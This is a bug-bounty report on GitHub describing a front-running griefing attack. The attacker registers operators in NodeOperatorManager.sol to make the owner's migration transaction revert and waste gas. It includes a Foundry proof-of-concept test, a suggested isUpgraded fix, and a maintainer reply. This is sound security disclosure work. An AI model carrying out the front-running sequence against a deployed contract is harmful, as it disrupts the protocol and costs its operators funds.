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Possible to grief and prevent protocol from migration in `NodeOperatorManager.sol` #42

Open hats-bug-reporter[bot] opened 11 months ago

hats-bug-reporter[bot] commented 11 months ago

Github username: @0xfuje Twitter username: 0xfuje Submission hash (on-chain): 0xcdf04182447950f2a421c34e08da524cc18f04953d78c3e7349310e282306659 Severity: medium



Protocol can lose huge gas fees, temporary prevention of migration until the issue is fixed


The initializeOnUpgrade() in NodeOperatorManager registers every operator with their totalKeys, keysUsed and ipfsHash: this might be a quite expensive operation depending on how much operators need to be migrated. An attacker can prevent the migration and grief the protocol with gas fees during the process.

src/NodeOperatorManager.sol - initializeOnUpgrade()

    /// @notice Migrates operator details from previous contract
    /// @dev Our previous node operator contract was non upgradeable. We will be moving to an upgradeable version but need this
    ///         function to migrate the data
    function initializeOnUpgrade(
        address[] memory _operator, 
        bytes[] memory _ipfsHash,
        uint64[] memory _totalKeys,
        uint64[] memory _keysUsed
    ) external onlyOwner {
        require((_operator.length == _ipfsHash.length) && (_operator.length == _totalKeys.length) && (_operator.length == _keysUsed.length), "Invalid lengths");
        for(uint256 x = 0; x < _operator.length; x++) {
            require(!registered[_operator[x]], "Already registered");

            KeyData memory keyData = KeyData({
                totalKeys: _totalKeys[x],
                keysUsed: _keysUsed[x],
                ipfsHash: abi.encodePacked(_ipfsHash[x])

            addressToOperatorData[_operator[x]] = keyData;
            registered[_operator[x]] = true;

            emit OperatorRegistered(

The attack is archived by first registering multiple operators in the previous contract. During the migration when the initializeOnUpgrade() will be called by the owner, the attacker will front-run the transaction and register their address via registerNodeOperator() that is also registered in the migration function. If the attacker is lucky and sophisticated enough, they will register the address that is close to the last operators, making sure the protocol pays maximum gas fees before the function reverts.

    require(!registered[_operator[x]], "Already registered");

Note that if the attacker registers many mock node operators that seem valid (perhaps by mimicking other real operator data), it will be hard to filter them out and each migration attempt they can execute this attack to prevent the protocol from migration and grief them one more time with gas fees.

Proof of Concept

  1. navigate to test/NodeOperatorManager.t.sol
  2. copy the below proof of concept inside NodeOperatorManagerTest contract
  3. run forge test --match-test testFail_GriefFrontRunMigration_0xfuje -vvvv

    function testFail_GriefFrontRunMigration_0xfuje() public {
        address attackerAddrOne = vm.addr(1337);
        address attackerAddrTwo = vm.addr(43634);
        address attackerAddrThree = vm.addr(34534);
        address[] memory operators = new address[](5);
        operators[0] = address(bob);
        operators[1] = address(alice);
        operators[2] = attackerAddrOne;
        operators[3] = attackerAddrTwo;
        operators[4] = attackerAddrThree;
        bytes[] memory hashes = new bytes[](5);
        hashes[0] = bobIPFS_Hash;
        hashes[1] = aliceIPFS_Hash;
        // attacker copies other honest operators ipfs hash
        hashes[2] = bobIPFS_Hash; 
        hashes[3] = aliceIPFS_Hash;
        hashes[4] = aliceIPFS_Hash;
        uint64[] memory totalKeys = new uint64[](5);
        totalKeys[0] = 10;
        totalKeys[1] = 15;
        totalKeys[2] = 10;
        totalKeys[3] = 23;
        totalKeys[4] = 15;
        uint64[] memory keysUsed = new uint64[](5);
        keysUsed[0] = 5;
        keysUsed[1] = 1;
        keysUsed[2] = 3;
        keysUsed[3] = 6;
        keysUsed[4] = 5;
        // 2. front-run: first migration
        nodeOperatorManagerInstance.registerNodeOperator(hashes[4], totalKeys[4]);
        // 1. first migration tx fails
        // 4. front-run: second migration
        nodeOperatorManagerInstance.registerNodeOperator(hashes[3], totalKeys[3]);
        // 3. second migration tx fails
        // 6. front-run: third migration
        nodeOperatorManagerInstance.registerNodeOperator(hashes[2], totalKeys[2]);
        // 5. third migration tx fails 


One easy way to mitigate this is to disallow node registration until initializeOnUpgrade() has been called. An isUpgraded variable can be initialized and set to true upon completion of initializeOnUpgrade(). The registerNodeOperator() function must require that isUpgraded is true.

+   bool isUpgraded;

    function initializeOnUpgrade(, , ,) external onlyOwner {
+          isUpgraded = true;

    function registerNodeOperator(
        bytes memory _ipfsHash,
        uint64 _totalKeys
    ) public whenNotPaused {
+          require(isUpgraded, "Contract not yet upgraded");
            require(!registered[msg.sender], "Already registered");
seongyun-ko commented 11 months ago

hi! No practical attack vector here. they don't have any economical incentive for the attack... But Thanks!!

0xfuje commented 11 months ago

Thanks! Yes, the attacker has no profit motive here, it's a griefing attack